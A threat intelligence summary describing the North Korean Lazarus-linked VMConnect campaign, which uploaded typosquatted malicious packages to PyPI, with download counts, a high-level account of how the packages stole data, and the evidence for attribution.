North Korean Hackers Behind Malicious VMConnect PyPI Campaign

Cyber Security Threat Summary:
North Korean state-sponsored hackers are behind the VMConnect campaign that uploaded to the PyPI (Python Package Index) repository malicious packages, one of them mimicking the VMware vSphere connector module vConnector. The packages were uploaded at the beginning of August, with one named VMConnect targeting IT professionals seeking virtualization tools” (Bleeping Computer, 2023).

While the package was removed from the PyPI platform, VMConnect was downloaded 237 times before it’s removal. Two other packages featuring the same code were also found, “names’ether” and “quantiumbase.” These two impersonated popular software projects, and were downloaded 253 and 216 times respectively.

ReversingLabs, who specializes in supply chain attack research, attributes the campaign to Labyrinth Collima, a subgroup of the North Korean Lazarus hackers.

Security Officer Comments:
The researchers discovered more packages that are part of the same VMConnect operation, namely ‘tablediter’ (736 downloads), ‘request-plus’ (43 downloads), and ‘requestspro’ (341 downloads). The malicious packages are attempting to mimic popular tools that help with editing tables and HTTP requests. By adding “plus” and “pro” to the package names, the hackers are attempting to trick victims into downloading a package with more features. The malicious packages feature the same description as the originals and contain minimal file structure and content differences, with the modifications primarily concerning the “init[.]py” file, which executes a malicious function from the ‘cookies[.]py’ that triggers data collection from the infected machine.

The malicious packages are able to deliver data from infected machines to the attacker’s command and control (C2) servers via a POST HTTP request. The server responds with a Python module that is obfuscated using Base64 and XOR and with execution parameters. The module also includes the download URL for the next stage payload, which the researchers were unable to retrieve.

Suggested Correction(s):
ReversingLabs was unable to analyze the final payload, but found enough evidence to link the VMConnect campaign to the Lazarus APT Group. “One argument is the discovery of the ‘builder[.]py’ file in the malicious packages, which contains the same payload decoding routine that JPCERT, Japan's Computer Security Incident Response Team (CSIRT) found on another file called ‘py_Qrcode.’ JPCERT attributed the code to another Lazarus subgroup they track as DangerousPassword. The functionality of that file is identical to a third one named ‘QRLog’ - a Java-based malware that Crowdstrike has attributed to Labyrinth Chollima with high confidence” (Bleeping Computer, 2023).